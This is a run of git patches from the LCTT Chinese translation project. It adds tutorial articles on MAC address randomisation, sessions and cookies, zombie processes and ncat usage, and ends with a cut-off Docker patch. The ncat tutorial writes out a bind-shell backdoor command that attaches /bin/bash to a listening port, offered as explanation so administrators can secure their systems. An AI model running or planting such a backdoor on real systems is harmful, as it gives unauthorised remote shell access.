这一设计的缺陷在于唯一性,不变的MAC地址正好可以用来追踪你。连上了星巴克的WiFi? 好,注意到了。在伦敦的地铁上? 也记录下来。 - - 如果你曾经在某一个WiFi验证页面上输入过你的真实姓名,你就已经把自己和这一MAC地址建立了联系。没有仔细阅读许可服务条款? 你可以认为,机场的免费WiFi正通过出售所谓的 ‘顾客分析数据’(你的个人信息)获利。出售的对象包括酒店,餐饮业,和任何想要了解你的人。 - - - 我不想信息被记录,再出售给多家公司,所以我花了几个小时想出了一个解决方案。 - - - ### MAC 地址不一定总是不变的 - - 幸运的是,在不断开网络的情况下,是可以随机生成一个伪MAC地址的。 - - - 我想随机生成我的MAC地址,但是有三个要求: - - - 1.MAC地址在不同网络中是不相同的。这意味着,我在星巴克和在伦敦地铁网络中的MAC地址是不相同的,这样在不同的服务提供商中就无法将我的活动联系起来 - - - 2.MAC地址需要经常更换,这样在网络上就没人知道我就是去年在这儿经过了75次的那个人 - - - 3. MAC地址一天之内应该保持不变。当MAC地址更改时,大多数网络都会与你断开连接,然后必须得进入验证页面再次登陆 - 这很烦人。 - - - ### 操作网络管理器 - - 我第一次尝试用一个叫做 `macchanger`的工具,但是失败了。网络管理器会根据它自己的设置恢复默认的MAC地址。 - - - 我了解到,网络管理器1.4.1以上版本可以自动生成随机的MAC地址。如果你在使用Ubuntu 17.04 版本,你可以根据这一配置文件实现这一目的。但这并不能完全符合我的三个要求 (你必须在随机和稳定这两个选项之中选择一个,但没有一天之内保持不变这一选项) - - - 因为我使用的是Ubuntu 16.04,网络管理器版本为1.2,不能直接使用高版本这一新功能。可能网络管理器有一些随机化方法支持,但我没能成功。所以我编了一个脚本来实现这一目标。 - - - 幸运的是,网络管理器1.2 允许生成随机MAC地址。你在已连接的网络中可以看见 ‘编辑连接’这一选项: - - - ![Screenshot of NetworkManager's edit connection dialog, showing a text entry for a cloned mac address](https://www.paulfurley.com/img/network-manager-cloned-mac-address.png) - - 网络管理器也支持消息处理 - 任何位于 `/etc/NetworkManager/dispatcher.d/pre-up.d/` 的脚本在建立网络连接之前都会被执行。 - - - ### 分配随机生成的伪MAC地址 - - 我想根据网络ID和日期来生成新的随机MAC地址。 我们可以使用网络管理器的命令行工具,nmcli,来显示所有可用网络: - - - ``` - > nmcli connection - NAME UUID TYPE DEVICE - Gladstone Guest 618545ca-d81a-11e7-a2a4-271245e11a45 802-11-wireless wlp1s0 - DoESDinky 6e47c080-d81a-11e7-9921-87bc56777256 802-11-wireless -- - PublicWiFi 79282c10-d81a-11e7-87cb-6341829c2a54 802-11-wireless -- - virgintrainswifi 7d0c57de-d81a-11e7-9bae-5be89b161d22 802-11-wireless -- - - ``` - - 因为每个网络都有一个唯一标识符,为了实现我的计划,我将UUID和日期拼接在一起,然后使用MD5生成hash值: - - ``` - - # eg 618545ca-d81a-11e7-a2a4-271245e11a45-2017-12-03 - - > echo -n "${UUID}-$(date +%F)" | md5sum - - 53594de990e92f9b914a723208f22b3f - - - ``` - 生成的结果可以代替MAC地址的最后八个字节。 - - - 值得注意的是,最开始的字节 `02` 代表这个地址是自行指定的。实际上,真实MAC地址的前三个字节是由制造商决定的,例如 `b4:b6:76` 就代表Intel。 - - - 有可能某些路由器会拒绝自己指定的MAC地址,但是我还没有遇到过这种情况。 - - - 每次连接到一个网络,这一脚本都会用`nmcli` 来指定一个随机生成的伪MAC地址: - - - ![A terminal window show a number of nmcli command line calls](https://www.paulfurley.com/img/terminal-window-nmcli-commands.png) - - 最后,我查看了 `ifconfig`的输出结果,我发现端口MAC地址已经变成了随机生成的地址,而不是我真实的MAC地址。 - - - ``` - > ifconfig - wlp1s0 Link encap:Ethernet HWaddr b4:b6:76:45:64:4d - inet addr:192.168.0.86 Bcast:192.168.0.255 Mask:255.255.255.0 - inet6 addr: fe80::648c:aff2:9a9d:764/64 Scope:Link - UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 - RX packets:12107812 errors:0 dropped:2 overruns:0 frame:0 - TX packets:18332141 errors:0 dropped:0 overruns:0 carrier:0 - collisions:0 txqueuelen:1000 - RX bytes:11627977017 (11.6 GB) TX bytes:20700627733 (20.7 GB) - - ``` - 完整的脚本可以在Github上查看。 - - - ``` - #!/bin/sh - - # /etc/NetworkManager/dispatcher.d/pre-up.d/randomize-mac-addresses - - # Configure every saved WiFi connection in NetworkManager with a spoofed MAC - # address, seeded from the UUID of the connection and the date eg: - # 'c31bbcc4-d6ad-11e7-9a5a-e7e1491a7e20-2017-11-20' - - # This makes your MAC impossible(?) to track across WiFi providers, and - # for one provider to track across days. - - # For craptive portals that authenticate based on MAC, you might want to - # automate logging in :) - - # Note that NetworkManager >= 1.4.1 (Ubuntu 17.04+) can do something similar - # automatically. - - export PATH=$PATH:/usr/bin:/bin - - LOG_FILE=/var/log/randomize-mac-addresses - - echo "$(date): $*" > ${LOG_FILE} - - WIFI_UUIDS=$(nmcli --fields type,uuid connection show |grep 802-11-wireless |cut '-d ' -f3) - - for UUID in ${WIFI_UUIDS} - do - UUID_DAILY_HASH=$(echo "${UUID}-$(date +F)" | md5sum) - - RANDOM_MAC="02:$(echo -n ${UUID_DAILY_HASH} | sed 's/^\(..\)\(..\)\(..\)\(..\)\(..\).*$/\1:\2:\3:\4:\5/')" - - CMD="nmcli connection modify ${UUID} wifi.cloned-mac-address ${RANDOM_MAC}" - - echo "$CMD" >> ${LOG_FILE} - $CMD & - done - - wait - ``` - - - - _更新:使用自己指定的MAC地址可以避免和真正的intel地址冲突。感谢 [@_fink][6]_ - - --------------------------------------------------------------------------------- - - -via: https://www.paulfurley.com/randomize-your-wifi-mac-address-on-ubuntu-1604-xenial/ - - 作者:[Paul M Furley ][a] - 译者:[译者ID](https://github.com/译者ID) - 校对:[校对者ID](https://github.com/校对者ID) - - 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - - [a]:https://www.paulfurley.com/ - [1]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f/raw/5f02fc8f6ff7fca5bca6ee4913c63bf6de15abca/randomize-mac-addresses - [2]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f#file-randomize-mac-addresses - [3]:https://github.com/ - [4]:http://cloudessa.com/products/cloudessa-aaa-and-captive-portal-cloud-service/ - [5]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f/revisions#diff-824d510864d58c07df01102a8f53faef - [6]:https://twitter.com/fink_/status/937305600005943296 - [7]:https://gist.github.com/paulfurley/978d4e2e0cceb41d67d017a668106c53/ - [8]:https://en.wikipedia.org/wiki/MAC_address#Universal_vs._local - [9]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f From ccb09b55ca82ba577de6e8f3f28f952fcc0af268 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=BB=98=E5=B3=A5?= <24203166+fuzheng1998@users.noreply.github.com> Date: Mon, 11 Dec 2017 20:39:29 +0800 Subject: [PATCH 0490/1627] =?UTF-8?q?=E8=BD=AC=E8=AE=A9?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 因期末考试临近,只好放弃该文章,明年再见 --- ...Study of Programming Languages and Code Quality in GitHub.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md b/sources/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md index 8934872a14..bb6b5bf693 100644 --- a/sources/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md +++ b/sources/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md @@ -1,4 +1,4 @@ -fuzheng1998 translating + A Large-Scale Study of Programming Languages and Code Quality in GitHub ============================================================ From d31198edeb646e2ff5117c4ec1107091a29e5bf7 Mon Sep 17 00:00:00 2001 From: darksun Date: Mon, 11 Dec 2017 21:38:00 +0800 Subject: [PATCH 0491/1627] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E5=AE=8C=E6=AF=95?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... And Cookies – How Does User-Login Work.md | 73 ------------------- ... And Cookies – How Does User-Login Work.md | 72 ++++++++++++++++++ 2 files changed, 72 insertions(+), 73 deletions(-) delete mode 100644 sources/tech/20171208 Sessions And Cookies – How Does User-Login Work.md create mode 100644 translated/tech/20171208 Sessions And Cookies – How Does User-Login Work.md diff --git a/sources/tech/20171208 Sessions And Cookies – How Does User-Login Work.md b/sources/tech/20171208 Sessions And Cookies – How Does User-Login Work.md deleted file mode 100644 index a53b0f8d61..0000000000 --- a/sources/tech/20171208 Sessions And Cookies – How Does User-Login Work.md +++ /dev/null @@ -1,73 +0,0 @@ -translating by lujun9972 -Sessions And Cookies – How Does User-Login Work? -====== -Facebook, Gmail, Twitter we all use these websites every day. One common thing among them is that they all require you to log in to do stuff. You cannot tweet on twitter, comment on Facebook or email on Gmail unless you are authenticated and logged in to the service. - - [![gmail, facebook login page](http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-1.jpg)][1] - -So how does it work? How does the website authenticate us? How does it know which user is logged in and from where? Let us answer each of these questions below. - -### How User-Login works? - -Whenever you enter your username and password in the login page of a site, the information you enter is sent to the server. The server then validates your password against the password on the server. If it doesn’t match, you get an error of incorrect password. But if it matches, you get logged in. - -### What happens when I get logged in? - -When you get logged in, the web server initiates a session and sets a cookie variable in your browser. The cookie variable then acts as a reference to the session created. Confused? Let us simplify this. - -### How does Session work? - -When the username and password are right, the server initiates a session. Sessions have a really complicated definition so I like to call them ‘beginning of a relationship’. - - [![session beginning of a relationship or partnership](http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-9.png)][2] - -When the credentials are right, the server begins a relationship with you. Since the server cannot see like us humans, it sets a cookie in our browsers to identify our unique relationship from all the other relationships that other people have with the server. - -### What is a Cookie? - -A cookie is a small amount of data that the websites can store in your browser. You must have seen them here. - - [![theitstuff official facebook page cookies](http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-1-4.png)][3] - -So when you log in and the server has created a relationship or session with you, it takes the session id which is the unique identifier of that session and stores it in your browser in form of cookies. - -### What’s the Point? - -The reason all of this is needed is to verify that it’s you so that when you comment or tweet, the server knows who did that tweet or who did that comment. - -As soon as you’re logged in, a cookie is set which contains the session id. Now, this session id is granted to the person who enters the correct username and password combination. - - [![facebook cookies in web browser](http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-2-3-e1508926255472.png)][4] - -So the session id is granted to the person who owns that account. Now whenever an activity is performed on that website, the server knows who it was by their session id. - -### Keep me logged in? - -The sessions have a time limit. Unlike the real world where relationships can last even without seeing the person for longer periods of time, sessions have a time limit. You have to keep telling the server that you are online by performing some or the other actions. If that doesn’t happen the server will close the session and you will be logged out. - - [![websites keep me logged in option](http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-3-3-e1508926314117.png)][5] - -But when we use the Keep me logged in feature on some websites, we allow them to store another unique variable in the form of cookies in our browsers. This unique variable is used to automatically log us in by checking it against the one on the server. When someone steals this unique identifier it is called as cookie stealing. They then get access to your account. - -### Conclusion - -We discussed how Login Systems work and how we are authenticated on a website. We also learned about what sessions and cookies are and how they are implemented in login mechanism. - -I hope you guys have grasped that how User-Login works, and if you still have a doubt regarding anything, just drop in a comment and I’ll be there for you. - --------------------------------------------------------------------------------- - -via: http://www.theitstuff.com/sessions-cookies-user-login-work - -作者:[Rishabh Kandari][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://www.theitstuff.com/author/reevkandari -[1]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-1.jpg -[2]:http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-9.png -[3]:http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-1-4.png -[4]:http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-2-3-e1508926255472.png -[5]:http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-3-3-e1508926314117.png diff --git a/translated/tech/20171208 Sessions And Cookies – How Does User-Login Work.md b/translated/tech/20171208 Sessions And Cookies – How Does User-Login Work.md new file mode 100644 index 0000000000..16b04b3e6c --- /dev/null +++ b/translated/tech/20171208 Sessions And Cookies – How Does User-Login Work.md @@ -0,0 +1,72 @@ +Sessions 与 Cookies – 用户登录的原理是什么? +====== +Facebook, Gmail, Twitter 是我们每天都会用的网站. 它们的共同点在于都需要你登录进去后才能做进一步的操作. 只有你通过认证并登录后才能在 twitter 发推, 在 Facebook 上评论,以及在 Gmail上处理电子邮件. + + [![gmail, facebook login page](http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-1.jpg)][1] + +那么登录的原理是什么? 网站是如何认证的? 它怎么知道是哪个用户从哪儿登录进来的? 下面我们来对这些问题进行一一解答. + +### 用户登录的原理是什么? + +每次你在网站的登录页面中输入用户名和密码时, 这些信息都会发送到服务器. 服务器随后会将你的密码与服务器中的密码进行验证. 如果两者不匹配, 则你会得到一个错误密码的提示. 如果两则匹配, 则成功登录. + +### 登陆时发生了什么? + +登录后, web 服务器会初始化一个 session 并在你的浏览器中设置一个 cookie 变量. 该 cookie 变量用于作为新建 session 的一个引用. 搞晕了? 让我们说的再简单一点. + +### 会话的原理是什么? + +服务器在用户名和密码都正确的情况下会初始化一个 session. Sessions 的定义很复杂,你可以把它理解为 `关系的开始`. + + [![session beginning of a relationship or partnership](http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-9.png)][2] + +认证通过后, 服务器就开始跟你展开一段关系了. 由于服务器不能象我们人类一样看东西, 它会在我们的浏览器中设置一个 cookie 来将我们的关系从其他人与服务器的关系标识出来. + +### 什么是 Cookie? + +cookie 是网站在你的浏览器中存储的一小段数据. 你应该已经见过他们了. + + [![theitstuff official facebook page cookies](http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-1-4.png)][3] + +当你登录后,服务器为你创建一段关系或者说一个 session, 然后将唯一标识这个 session 的 session id 以 cookie 的形式存储在你的浏览器中. + +### 什么意思? + +所有这些东西存在的原因在于识别出你来,这样当你写评论或者发推时, 服务器能知道是谁在发评论,是谁在发推. + +当你登录后, 会产生一个包含 session id 的 cookie. 这样, 这个 session id 就被赋予了那个输入正确用户名和密码的人了. + + [![facebook cookies in web browser](http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-2-3-e1508926255472.png)][4] + +也就是说, session id 被赋予给了拥有这个账户的人了. 之后,所有在网站上产生的行为, 服务器都能通过他们的 session id 来判断是由谁发起的. + +### 如何让我保持登录状态? + +session 有一定的时间限制. 这一点与现实生活中不一样,现实生活中的关系可以在不见面的情况下持续很长一段时间, 而 session 具有时间限制. 你必须要不断地通过一些动作来告诉服务器你还在线. 否则的话,服务器会关掉这个 session,而你会被登出. + + [![websites keep me logged in option](http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-3-3-e1508926314117.png)][5] + +不过在某些网站上可以启用 `保持登录(Keep me logged in)`, 这样服务器会将另一个唯一变量以 cookie 的形式保存到我们的浏览器中. 这个唯一变量会通过与服务器上的变量进行对比来实现自动登录. 若有人盗取了这个唯一标识(我们称之为 cookie stealing), 他们就能访问你的账户了. + +### 结论 + +我们讨论了登录系统的工作原理以及网站是如何进行认证的. 我们还学到了什么是 sessions 和 cookies,以及它们在登录机制中的作用. + +我们希望你们以及理解了用户登录的工作原理, 如有疑问, 欢迎提问. + +-------------------------------------------------------------------------------- + +via: http://www.theitstuff.com/sessions-cookies-user-login-work + +作者:[Rishabh Kandari][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.theitstuff.com/author/reevkandari +[1]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-1.jpg +[2]:http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-9.png +[3]:http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-1-4.png +[4]:http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-2-3-e1508926255472.png +[5]:http://www.theitstuff.com/wp-content/uploads/2017/10/pasted-image-0-3-3-e1508926314117.png From 5b9df7d564cc67f555e797a2876289584199000d Mon Sep 17 00:00:00 2001 From: darsh8 <752458434@qq.com> Date: Mon, 11 Dec 2017 21:45:58 +0800 Subject: [PATCH 0492/1627] darsh8 translating --- sources/talk/20170131 Book review Ours to Hack and to Own.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/talk/20170131 Book review Ours to Hack and to Own.md b/sources/talk/20170131 Book review Ours to Hack and to Own.md index 1405bfe34a..a75a39a718 100644 --- a/sources/talk/20170131 Book review Ours to Hack and to Own.md +++ b/sources/talk/20170131 Book review Ours to Hack and to Own.md @@ -1,3 +1,5 @@ +darsh8 Translating + Book review: Ours to Hack and to Own ============================================================ From 78830dcf32d6703c137791d12b26673cc8e20ef4 Mon Sep 17 00:00:00 2001 From: darksun Date: Mon, 11 Dec 2017 21:58:48 +0800 Subject: [PATCH 0493/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20What=20Are=20Zo?= =?UTF-8?q?mbie=20Processes=20And=20How=20To=20Find=20&=20Kill=20Zombie=20?= =?UTF-8?q?Processes=3F?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...nd How To Find & Kill Zombie Processes-.md | 90 +++++++++++++++++++ 1 file changed, 90 insertions(+) create mode 100644 sources/tech/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md diff --git a/sources/tech/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md b/sources/tech/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md new file mode 100644 index 0000000000..a0d01b195a --- /dev/null +++ b/sources/tech/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md @@ -0,0 +1,90 @@ +translating by lujun9972 +What Are Zombie Processes And How To Find & Kill Zombie Processes? +====== + [![What Are Zombie Processes And How To Find & Kill Zombie Processes?](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/what-are-the-zombie-processes_orig.jpg)][1] + +If you are a regular Linux user, you must have encountered the term `Zombie Processes`. So what are the Zombie Processes? How do they get created? Are they harmful to the system? How do I kill these processes? Keep reading for the answers to all these questions. + +### What are Zombie Processes? + +So we all know how processes work. We launch a program, start our task & once our task is over, we end that process. Once the process has ended, it has to be removed from the processes table. + +​ + +You can see the current processes in the ‘System-Monitor’. + + [![Replace the pid with the id of the parent process so that the parent process will remove all the child processes that are dead and completed. Imagine it Like this : “You find a dead body in the middle of the road, you call the dead body’s family and they take that body away from the road.” But a lot of programs are not programmed well enough to remove these child zombies because if they were, you wouldn’t have those zombies in the first place. So the only thing guaranteed to remove Child Zombies is killing the parent.](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/linux-check-zombie-processes_orig.jpg)][2] + +But, sometimes some of these processes stay in the processes table even after they have completed execution. + +​ + +So these processes that have completed their life of execution but still exist in the processes table are called ‘Zombie Processes’. + +### And How Exactly do they get Created? + +Whenever we run a program it creates a parent process and a lot of child processes. All of these child processes use resources such as memory and CPU allocated to them by the kernel. + +​ + +Once these child processes have finished executing they send an Exit call and die. This Exit call has to be read by the parent process which later calls the wait command to read the exit_status of the child process so that the child process can be removed from the processes table. + +If the Parent reads the Exit call correctly sent by the Child Process, the process is removed from the processes table. + +But, if the parent fails to read the exit call from the child process, the child process which has already finished its execution and is now dead will not be removed from the processes table. + +### Are Zombie processes harmful to the System? + +**No. ** + +Since zombie process is not doing any work, not using any resources or affecting any other process, there is no harm in having a zombie process. But since the exit_status and other process information from the process table are stored in the RAM, having too many Zombie processes can sometimes be an issue. + + **_Imagine it Like this :_** + +“ + + _You are the owner of a construction company. You pay daily wages to all your workers depending upon how they work. _ _A worker comes to the construction site every day, just sits there, you don’t have to pay him, he doesn’t do any work. _ _He just comes every day and sits, that’s it !”_ + +Such a worker is the living example of a zombie process. + +**But,** + +if you have a lot of zombie workers, your construction site will get crowded and it might get difficult for the people that are actually working. + +### So how to find Zombie Processes? + +Fire up a terminal and type the following command - + +ps aux | grep Z + +You will now get details of all zombie processes in the processes table. + +### How to kill Zombie processes? + +Normally we kill processes with the SIGKILL command but zombie processes are already dead. You Cannot kill something that is already dead. So what you do is you type this command - + +kill -s SIGCHLD pid + +​Replace the pid with the id of the parent process so that the parent process will remove all the child processes that are dead and completed. + + **_Imagine it Like this :_** + +“ + + _You find a dead body in the middle of the road, you call the dead body’s family and they take that body away from the road.”_ + +But a lot of programs are not programmed well enough to remove these child zombies because if they were, you wouldn’t have those zombies in the first place. So the only thing guaranteed to remove Child Zombies is killing the parent. + +-------------------------------------------------------------------------------- + +via: http://www.linuxandubuntu.com/home/what-are-zombie-processes-and-how-to-find-kill-zombie-processes + +作者:[linuxandubuntu][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.linuxandubuntu.com +[1]:http://www.linuxandubuntu.com/home/what-are-zombie-processes-and-how-to-find-kill-zombie-processes +[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/linux-check-zombie-processes_orig.jpg From 319214bfcd528ec9b4a487f36dccaf15a57bb3ea Mon Sep 17 00:00:00 2001 From: darksun Date: Mon, 11 Dec 2017 22:08:47 +0800 Subject: [PATCH 0494/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=2010=20useful=20n?= =?UTF-8?q?cat=20(nc)=20Command=20Examples=20for=20Linux=20Systems?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...(nc) Command Examples for Linux Systems.md | 200 ++++++++++++++++++ 1 file changed, 200 insertions(+) create mode 100644 sources/tech/20171206 10 useful ncat (nc) Command Examples for Linux Systems.md diff --git a/sources/tech/20171206 10 useful ncat (nc) Command Examples for Linux Systems.md b/sources/tech/20171206 10 useful ncat (nc) Command Examples for Linux Systems.md new file mode 100644 index 0000000000..8264014664 --- /dev/null +++ b/sources/tech/20171206 10 useful ncat (nc) Command Examples for Linux Systems.md @@ -0,0 +1,200 @@ +translating by lujun9972 +10 useful ncat (nc) Command Examples for Linux Systems +====== + [![nc-ncat-command-examples-Linux-Systems](https://www.linuxtechi.com/wp-content/uploads/2017/12/nc-ncat-command-examples-Linux-Systems.jpg)][1] + +ncat or nc is networking utility with functionality similar to cat command but for network. It is a general purpose CLI tool for reading, writing, redirecting data across a network. It is designed to be a reliable back-end tool that can be used with scripts or other programs. It’s also a great tool for network debugging, as it can create any kind of connect one can need. + +ncat/nc can be a port scanning tool, or a security tool, or monitoring tool and is also a simple TCP proxy. Since it has so many features, it is known as a network swiss army knife. It’s one of those tools that every System Admin should know & master. + +In most of Debian distributions ‘nc’ is available and its package is automatically installed during installation. But in minimal CentOS 7 / RHEL 7 installation you will not find nc as a default package. You need to install using the following command. + +``` +[root@linuxtechi ~]# yum install nmap-ncat -y +``` + +System admins can use it audit their system security, they can use it find the ports that are opened & than secure them. Admins can also use it as a client for auditing web servers, telnet servers, mail servers etc, with ‘nc’ we can control every character sent & can also view the responses to sent queries. + +We can also cause it to capture data being sent by client to understand what they are upto. + +In this tutorial, we are going to learn about how to use ‘nc’ command with 10 examples, + +#### Example: 1) Listen to inbound connections + +Ncat can work in listen mode & we can listen for inbound connections on port number with option ‘l’. Complete command is, + +$ ncat -l port_number + +For example, + +``` +$ ncat -l 8080 +``` + +Server will now start listening to port 8080 for inbound connections. + +#### Example: 2) Connect to a remote system + +To connect to a remote system with nc, we can use the following command, + +$ ncat IP_address port_number + +Let’s take an example, + +``` +$ ncat 192.168.1.100 80 +``` + +Now a connection to server with IP address 192.168.1.100 will be made at port 80 & we can now send instructions to server. Like we can get the complete page content with + +GET / HTTP/1.1 + +or get the page name, + +GET / HTTP/1.1 + +or we can get banner for OS fingerprinting with the following, + +HEAD / HTTP/1.1 + +This will tell what software is being used to run the web Server. + +#### Example: 3) Connecting to UDP ports + +By default , the nc utility makes connections only to TCP ports. But we can also make connections to UDP ports, for that we can use option ‘u’, + +``` +$ ncat -l -u 1234 +``` + +Now our system will start listening a udp port ‘1234’, we can verify this using below netstat command, + +``` +$ netstat -tunlp | grep 1234 +udp 0 0 0.0.0.0:1234 0.0.0.0:* 17341/nc +udp6 0 0 :::1234 :::* 17341/nc +``` + +Let’s assume we want to send or test UDP port connectivity to a specific remote host, then use the following command, + +$ ncat -v -u {host-ip} {udp-port} + +example: + +``` +[root@localhost ~]# ncat -v -u 192.168.105.150 53 +Ncat: Version 6.40 ( http://nmap.org/ncat ) +Ncat: Connected to 192.168.105.150:53. +``` + +#### Example: 4) NC as chat tool + +NC can also be used as chat tool, we can configure server to listen to a port & than can make connection to server from a remote machine on same port & start sending message. On server side, run + +``` +$ ncat -l 8080 +``` + +On remote client machine, run + +``` +$ ncat 192.168.1.100 8080 +``` + +Than start sending messages & they will be displayed on server terminal. + +#### Example: 5) NC as a proxy + +NC can also be used as a proxy with a simple command. Let’s take an example, + +``` +$ ncat -l 8080 | ncat 192.168.1.200 80 +``` + +Now all the connections coming to our server on port 8080 will be automatically redirected to 192.168.1.200 server on port 80\. But since we are using a pipe, data can only be transferred & to be able to receive the data back, we need to create a two way pipe. Use the following commands to do so, + +``` +$ mkfifo 2way +$ ncat -l 8080 0<2way | ncat 192.168.1.200 80 1>2way +``` + +Now you will be able to send & receive data over nc proxy. + +#### Example: 6) Copying Files using nc/ncat + +NC can also be used to copy the files from one system to another, though it is not recommended & mostly all systems have ssh/scp installed by default. But none the less if you have come across a system with no ssh/scp, you can also use nc as last ditch effort. + +Start with machine on which data is to be received & start nc is listener mode, + +``` +$ ncat -l 8080 > file.txt +``` + +Now on the machine from where data is to be copied, run the following command, + +``` +$ ncat 192.168.1.100 8080 --send-only < data.txt +``` + +Here, data.txt is the file that has to be sent. –send-only option will close the connection once the file has been copied. If not using this option, than we will have press ctrl+c to close the connection manually. + +We can also copy entire disk partitions using this method, but it should be done with caution. + +#### Example: 7) Create a backdoor via nc/nact + +NC command can also be used to create backdoor to your systems & this technique is actually used by hackers a lot. We should know how it works in order to secure our system. To create a backdoor, the command is, + +``` +$ ncat -l 10000 -e /bin/bash +``` + +‘e‘ flag attaches a bash to port 10000\. Now a client can connect to port 10000 on server & will have complete access to our system via bash, + +``` +$ ncat 192.168.1.100 1000 +``` + +#### Example: 8) Port forwarding via nc/ncat + +We can also use NC for port forwarding with the help of option ‘c’ , syntax for accomplishing port forwarding is, + +``` +$ ncat -u -l 80 -c 'ncat -u -l 8080' +``` + +Now all the connections for port 80 will be forwarded to port 8080. + +#### Example: 9) Set Connection timeouts + +Listener mode in ncat will continue to run & would have to be terminated manually. But we can configure timeouts with option ‘w’, + +``` +$ ncat -w 10 192.168.1.100 8080 +``` + +This will cause connection to be terminated in 10 seconds, but it can only be used on client side & not on server side. + +#### Example: 10) Force server to stay up using -k option in ncat + +When client disconnects from server, after sometime server also stops listening. But we can force server to stay connected & continuing port listening with option ‘k’. Run the following command, + +``` +$ ncat -l -k 8080 +``` + +Now server will stay up, even if a connection from client is broken. + +With this we end our tutorial, please feel free to ask any question regarding this article using the comment box below. + +-------------------------------------------------------------------------------- + +via: https://www.linuxtechi.com/nc-ncat-command-examples-linux-systems/ + +作者:[Pradeep Kumar][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxtechi.com/author/pradeep/ +[1]:https://www.linuxtechi.com/wp-content/uploads/2017/12/nc-ncat-command-examples-Linux-Systems.jpg From 8af68db28d3a95ebd6dec23b54918dda6ccc3b35 Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 11 Dec 2017 22:33:43 +0800 Subject: [PATCH 0495/1627] PRF:20171202 docker - Use multi-stage builds.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @iron0x 恭喜你,完成了第一篇翻译! --- ...0171202 docker - Use multi-stage builds.md | 52 ++++++++----------- 1 file changed, 23 insertions(+), 29 deletions(-) diff --git a/translated/tech/20171202 docker - Use multi-stage builds.md b/translated/tech/20171202 docker - Use multi-stage builds.md index b8bb2acf0a..706d98e7f4 100644 --- a/translated/tech/20171202 docker - Use multi-stage builds.md +++ b/translated/tech/20171202 docker - Use multi-stage builds.md @@ -1,18 +1,19 @@ -使用多阶段构建 +Docker:使用多阶段构建镜像 ============================================================ -多阶段构建是 `Docker 17.05` 或更高版本提供的新功能。这对致力于优化 `Dockerfile` 的人来说,使得 `Dockerfile` 易于阅读和维护。 +多阶段构建是 Docker 17.05 及更高版本提供的新功能。这对致力于优化 Dockerfile 的人来说,使得 Dockerfile 易于阅读和维护。 -> 致谢: 特别感谢 [Alex Ellis][1] 授权使用他的关于 `Docker` 多阶段构建的博客文章 [Builder pattern vs. Multi-stage builds in Docker][2] 作为以下示例的基础. +> 致谢: 特别感谢 [Alex Ellis][1] 授权使用他的关于 Docker 多阶段构建的博客文章 [Builder pattern vs. 